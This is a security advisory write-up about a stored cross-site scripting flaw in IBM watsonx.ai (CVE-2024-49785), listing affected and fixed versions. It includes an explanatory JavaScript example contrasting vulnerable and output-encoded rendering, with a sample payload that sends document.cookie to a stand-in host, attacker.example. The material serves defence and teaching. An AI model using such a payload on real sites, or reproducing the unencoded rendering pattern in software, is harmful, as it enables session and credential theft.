A recently disclosed vulnerability, identified as CVE-2024-49785, has been found in IBM watsonx.ai, including its integration with IBM Cloud Pak for Data.
This vulnerability exposes users to cross-site scripting (XSS) attacks, potentially compromising sensitive information.
The issue arises from improper neutralization of user-supplied input in the Web UI of IBM watsonx.ai. An authenticated user can embed arbitrary JavaScript in the application interface, and that script then runs in the browser of another user who views the injected content within a trusted session.
This can alter the intended functionality of the UI and lead to disclosure of credentials or session material belonging to the victim.
The vulnerability has been classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and carries a CVSS Base Score of 5.4, a medium severity rating.
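To make the CWE-79 failure concrete, here is an added illustration; it is not IBM's code and says nothing about how the watsonx.ai UI is actually implemented. It shows a renderer that concatenates a stored, user-controlled profile field straight into HTML beside one that output-encodes the field first, then checks which of the two outputs still contains markup a browser would execute. The `displayName` field, the function names and the payload are all constructed for the example.

```javascript
// Added illustration of CWE-79 (stored XSS) in a web UI: a vulnerable
// renderer that concatenates a stored, attacker-controlled field straight
// into HTML, beside a hardened renderer that output-encodes it.
// Generic example code, NOT IBM watsonx.ai source; the field name
// "displayName" and the payload are constructed for the demonstration.

// Minimal HTML entity encoder for text placed inside element content.
// Attribute, URL and JavaScript contexts need their own encoders; this
// one is only safe for the element-body context used below.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// VULNERABLE: untrusted data is interpolated into markup unchanged.
// Any authenticated user who can set displayName now controls the DOM
// that every other user's browser builds when it renders this profile.
function renderProfileVulnerable(profile) {
  return '<div class="profile"><span class="name">' +
    profile.displayName + '</span></div>';
}

// HARDENED: the untrusted value is encoded for the HTML context before
// being joined into markup, so the browser displays the payload as text.
function renderProfileSafe(profile) {
  return '<div class="profile"><span class="name">' +
    escapeHtml(profile.displayName) + '</span></div>';
}

// Crude check used by the demonstration: does the rendered string contain
// a <script> element or a tag carrying an on* event-handler attribute?
// Real validation belongs in an HTML parser, not a regex, but this is
// enough to show the difference between the two renderers.
function containsExecutableMarkup(html) {
  return /<script\b|<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Constructed stored-XSS payload: an image with a bad src and an onerror
// handler, the classic way to run script without needing a <script> tag.
const maliciousProfile = {
  displayName:
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

const vulnerableOutput = renderProfileVulnerable(maliciousProfile);
const safeOutput = renderProfileSafe(maliciousProfile);

console.log('vulnerable renderer emits executable markup:',
  containsExecutableMarkup(vulnerableOutput));
console.log('hardened renderer emits executable markup:  ',
  containsExecutableMarkup(safeOutput));
console.log(safeOutput);
```

In a browser the same rule applies to DOM APIs: assigning user data to `element.textContent` is the equivalent of `renderProfileSafe`, while `element.innerHTML` is the equivalent of `renderProfileVulnerable`. A Content Security Policy that disallows inline script is a useful second layer, but it does not replace output encoding.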
Affected Products and Versions

| Product | Version(s) |
|---|---|
| IBM watsonx.ai on Cloud Pak for Data | 4.8 – 5.0.3 |
| IBM watsonx.ai | 1.1 – 2.0.3 |
IBM strongly advises users to upgrade to the following fixed versions to mitigate the risk (the Cloud Pak for Data platform is named IBM Software Hub from release 5.1 onward):

| Product | Fixed Version(s) |
|---|---|
| IBM watsonx.ai on IBM Software Hub | 5.1.0 and above |
| IBM watsonx.ai | 2.1.0 and above |
IBM advises all customers to subscribe to “My Notifications” for timely alerts about security updates and product support bulletins.
Additionally, users can refer to IBM’s Secure Engineering Web Portal and Product Security Incident Response Blog for further guidance.
This vulnerability was disclosed on January 10, 2025. It is exploitable over the network by an authenticated user, and successful exploitation requires interaction from the victim whose session is targeted.
For more details on upgrading and securing your systems, visit IBM’s official security bulletin or consult the CVE database entry.
By addressing this issue proactively, organizations can prevent potential exploitation and safeguard their sensitive data from malicious actors.